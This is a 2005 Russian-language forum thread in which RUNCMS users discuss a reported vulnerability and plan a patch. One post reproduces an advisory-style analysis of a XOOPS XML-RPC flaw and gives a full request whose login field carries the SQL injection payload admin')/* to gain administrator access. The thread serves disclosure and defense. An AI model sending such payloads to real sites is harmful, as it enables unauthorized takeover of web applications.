Сайт сообщества | Клуб пользователей | О проекте

Имя
Пароль
ПравилаРегистрацияСправка
Сообщения за деньПоиск

Вернуться   Клуб пользователей портальной системы RUNCMS > Портал > Безопасность

Ответ
 
Опции темы Опции просмотра
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #1 07-04-2005, 23:49

На http://www.runcms.org появилась информация о возможной уязвимости в последней версии RUNCMS. Подробности пока не сообщаются. Сообщивший это связался с разработчиком.

Поэтому следите за новостями на нашем сайте и http://www.runcms.org. Обсуждение ведется в этой теме: Serious Security issues In RunCMS


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
Manga вне форума Manga
Далекая Радуга

Аватар для Manga

| Цитировать Старый #2 07-05-2005, 00:17

В версии 1.2?


Для девочек

Посетить домашнюю страницу Manga
  Сообщения: 682 c 08.03.2004 | Репутация: 11
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #3 07-05-2005, 00:25

Цитата:
Manga:
В версии 1.2?
james, который сообщает об уязвимости говорит о "последней" версии - "Why will the developers not be online soon? And yes, it applies to the latest version, and the issues range from SQL Injection to possible remote code execution."


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
Vor2ex вне форума Vor2ex
Старший участник

Аватар для Vor2ex

| Цитировать Старый #4 07-05-2005, 00:29

ну если там не было глобальных изменений значит и на предидущей тоже есть

  Сообщения: 1,131 c 03.08.2004 | Репутация: ??
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #5 07-05-2005, 08:23

Тут недавно пролихорадило CMS использующие XMLRPC. И таки да - в phpRPC так же дырка имеется.


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
vanysha вне форума vanysha
Зам старшего участника

Аватар для vanysha

| Цитировать Старый #6 07-05-2005, 08:48

SQL Инъекция:
Как и упоминалось раньше, XOOPS имеет свой XMLRPC сервер который активирован по умолчанию и имеет название xmlrpc.php Проблема с XMLRPC в xoops является недостаточная очистка ссылок, потому, что данные вводятся из $HTTP_RAW_POST_DATA Это большая ошибка, которая позволяет применить метод RPC в данной уязвимости XOOPS XMLRPC и провести SQL инъекцию. Как? приведем простой пример. Этот код из файла bloggerapi.php который сохраняет все XMLRPC запросы.

PHP код:
function getUserInfo()
{  if (!
$this->_checkUser($this->params[1],
$this->params[2])) {  
$this->response
->add(new XoopsXmlRpcFault(104));
} else {  
$struct = new XoopsXmlRpcStruct();
$struct->
add('nickname',
new 
XoopsXmlRpcString
($this->user->getVar('uname')));
$struct->
add('userid', new XoopsXmlRpcString
($this->user->getVar('uid')));
$struct->
add('url', new XoopsXmlRpcString
($this->user->getVar('url')));
$struct->
add('email', new XoopsXmlRpcString
($this->user->getVar('email')));
$struct->
add('lastname', new XoopsXmlRpcString(''));
$struct->add('firstname',
new 
XoopsXmlRpcString($this->user->getVar('name')));
$this->response->add($struct);  }  } 

функция _checkUser на самом деле лишь "обертка" для XMLRPC сервера, так как аргументы передаются в XOOPS функцией ядра "loginUser()" с которой и есть настоящая проблема. Ниже приведен простой пример xml файла который отсылает серверу нужный RPC запрос:

PHP код:

<?xml version="1.0"?>
<methodCall>
<methodName>blogger.getPost</methodName>
<params>
<param>
<value><string></string></value>
</param>
<param>
<value><string></string></value>
</param>
<param>
<value><string>admin')/*</string></value>
</param>
<param>
<value><string>passwordfield</string></value>
</param>
<param>
<value><string></string></value>
</param>
</params>
</methodCall>


Здесь мы получаем доступ как у админа и затем исполняем метод blogger.getPost.
Атакующий получает администраторские привилегии с которыми можно делать всё, что угодно
=================================
Это-уязвимость в XOOPS 2.0.11. RunCMS базируется на xoops и также имеет риск проведения XML-RPC атаки.

Последний раз редактировалось vanysha, 07-05-2005 в 08:51


Просто включить весну. Текстура - мокрый асфальт
Неба на пять мегабайт и ветра побольше дать
Бросить все силы на дождь, но даже моих мегагерц
Не хватит чтоб сделать запах дождя....

Посетить домашнюю страницу vanysha
  Сообщения: 387 c 27.10.2004 | Репутация: 8
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #7 07-05-2005, 09:00

Небольшой комментарий. У XOOPS и RUNCMS XML-RPC серверы разные. Однако и там и там дырка в функции авторизации. В XOOPS это закрыли. В некоторых CMS ничтоже сумняшеси даже рекомендовали постирать XML-RPC модули (например в PostNuke ).

Одним словом дырка легко закрывается. Если в течении суток на оф-сайте патч не выложат, то выложим у себя.

Но нужно подождать, может изночально не эта уязвимость имелась в виду.


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
vanysha вне форума vanysha
Зам старшего участника

Аватар для vanysha

| Цитировать Старый #8 07-05-2005, 09:01

Ждем-с


Просто включить весну. Текстура - мокрый асфальт
Неба на пять мегабайт и ветра побольше дать
Бросить все силы на дождь, но даже моих мегагерц
Не хватит чтоб сделать запах дождя....

Посетить домашнюю страницу vanysha
  Сообщения: 387 c 27.10.2004 | Репутация: 8
Zormax вне форума Zormax
Старожил

Аватар для Zormax

| Цитировать Старый #9 07-05-2005, 19:47

А это к нам косвенно не относится: _http://www.securitylab.ru/55593.html


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
saidnavy вне форума saidnavy
Зам старшего участника


| Цитировать Старый #10 07-05-2005, 21:35

Наверное, стоит тогда по окончанию решения дать в новостях объявление?! А то не каждый форум отслеживает.

Посетить домашнюю страницу saidnavy
  Сообщения: 363 c 24.02.2005 | Репутация: 7
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Рейтинг@Mail.ru Хостинг провайдер Majordomo. Powered by: vBulletin Version 3.0
Copyright ©2000-2025, Jelsoft Enterprises Ltd.
Все разделы прочитаны - Руководство форума - Архив - Вверх
Rambler's Top100
Output: 94.29 Kb. compressed to 86.90 Kb. by saving 7.38 Kb. (7.83%)
Page generated in 0.09526 seconds with 11 queries